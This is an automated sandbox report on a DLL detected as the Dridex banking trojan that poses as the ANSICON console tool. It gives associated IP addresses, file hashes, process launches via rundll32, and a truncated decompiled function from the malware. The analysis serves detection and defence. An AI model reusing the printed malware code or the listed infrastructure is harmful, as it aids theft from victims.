Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RuRxpMUPN7.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.5% (good quality ratio 50.6%) Quality average: 80% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 87% Number of executed functions: 24 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
50.116.27.97	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_3aebf4f4b63c22f8e81111ea58d346011b6f5fc_160cf2be_132a0802\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9230
Entropy (8bit):	3.762348717652181
Encrypted:	false
SSDEEP:	96:ChWZFS85Xyly9hA/C5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgC6eugtYsaYOhoJ:CA6WHUb+hjbjBq/u7sES274Itb2s
MD5:	CA3AEF66AC9C7A801C188686165EB326
SHA1:	5192A63B10194B0AB3B44C97AF7C942F11A44933
SHA-256:	7698401D0C0F2200E9EB9B93867825FE017ECE7D53F3D8BECCDB07E6568BDFB4
SHA-512:	CEBE3EDBD7952003D5773B272AD5B2E756420814DFF070254AC2B3C61E253F16DECC307104735BB0983D785435B0FA6DB60E849DADA75B0B0201A559E5A38B04
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.4.2.4.2.0.5.5.5.3.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.e.7.c.b.8.1.-.b.b.0.9.-.4.0.b.4.-.9.1.b.1.-.8.4.7.d.2.2.6.f.3.5.d.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.3.8.0.b.e.3.-.f.0.1.b.-.4.3.3.5.-.a.0.5.e.-.4.7.b.5.f.7.f.d.7.0.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.3.c.-.0.0.0.1.-.0.0.1.b.-.5.8.2.5.-.7.2.2.8.6.5.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER228.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.428972233130948
Encrypted:	false
SSDEEP:	48:cvIwSD8zs5JgtWI9x1WSC8B6j8fm8M4JVpNF0N3+q8v7pmNKcQIcQw6Ur0d:uITfLeESNvJ83K4NKkw680d
MD5:	066DC1C544D89584B84AD32B470A1025
SHA1:	E1FDA503CF56971078CECBB10707EA19DFEBD85B
SHA-256:	AFEC2C51CD229BC6EEF2E110E04D19E69038074D99997A89296C4E04E6C5BEA9
SHA-512:	1CC80EEE50E23A2E39716D1FB9DE0993CD8BAEBFD95B2B3BA5435591CE47837F44636240AE6D5DF74F2AE1A9C3247C49FA63728399C82F37FD9B8E4A84EB80E3
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="953697" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF739.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Apr 19 21:47:01 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	26186
Entropy (8bit):	2.557190136356261
Encrypted:	false
SSDEEP:	192:gVp7R1eGmxxWM3KEmuB2f2+vhc+jstsDIwT:s7R1Q1eD7jsts3T
MD5:	573CD1230878E8C8511A1B4AFAFB492F
SHA1:	5779A3380825369DCAFAEEC7070ABB21029D57B8
SHA-256:	C4FE92124A9460876BD6BEF5ABC5B1FF868D28029EF1FB3F063F56D8A9BB5D60
SHA-512:	23FD3A5C5033F5FF797C9A708A78C09FD483A33728A70E5DBE7E325889AF0DF71826D0617E6A06E8C8F756F6E386C213B9CC2C3882C2BC1F21C0628E2A7FD4E1
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......U.}`...................U...........B......,.......GenuineIntelW...........T.......<.....}`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCB8.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.6891292442119217
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioG60K4J6YrGSUF2GbgmfAS1p+pBS89bt4sfywPm:RrlsNiJ60K26YaSUF2GbgmfAS1ktrfW
MD5:	597AE1BDA78E8AA8260EE178869F857E
SHA1:	4FF70C0545A96B9C139D4B487FD22C7A601843F0
SHA-256:	422239A8A44372E4642564FD408F641962EA78F18A638F5F3ACC82D30B48A7C1
SHA-512:	1A22F3F6D0443ED299F40D86949D2DEFDCEBC90D504B162C462851F62F302ACDDBF91955B372C1DAF0CC973DE8B72D005F2DF98B2AC531D747E8C9CF154D4FFA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.2.<./.P.i.d.>.......

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.548557274908702
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RuRxpMUPN7.dll
File size:	163840
MD5:	f6a73ad1c962b6d3d979066d37da71b5
SHA1:	c19b72b1b07a8065f2a62be97cb1cccfb1d5b93f
SHA256:	8d357ea7f4cbfcbbd9af86a34c421b7011204c83efa788b2527a79f9c464f287
SHA512:	d91d9b8de5601bb3f419ece53394fee115b5b7ff4fdf520acd3963fba03c25d6fd5ae38cc5fee79bd9afd75da34e93413b16d8d31fd45b1385f2d5047bfb1850
SSDEEP:	3072:WWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:W42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E2 [Mon Apr 19 20:15:30 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007F7DE8F202EBh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6972 Parent PID: 6016

General

Start time:	23:44:21
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll'
Imagebase:	0x950000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6992 Parent PID: 6972

General

Start time:	23:44:22
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7024 Parent PID: 6992

General

Start time:	23:44:22
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Imagebase:	0xc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7108 Parent PID: 6972

General

Start time:	23:44:55
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord
Imagebase:	0xc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.1042088128.000000006FC41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4936 Parent PID: 6972

General

Start time:	23:46:57
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 144
Imagebase:	0xc0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 7024 Parent PID: 6992 rundll32.exeCOMMON

Executed Functions

Function 6FC507CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E6FC507CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x6fc5d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E6FC53558(0x30);
					 *0x6fc5d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E6FC535D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E6FC52F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x6fc5d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E6FC51094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x6fc5d1f8 + 0xb)) = _t159;
						_t355 = E6FC52F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x6fc5d1f8 + 0x28)) = 0;
							_t163 = E6FC507CC(0x6fc5d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x6fc5bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x6fc5bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E6FC4F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E6FC4F8C4(_t424 + 0x24, E6FC4F568(_t424 + 0x20) + 4);
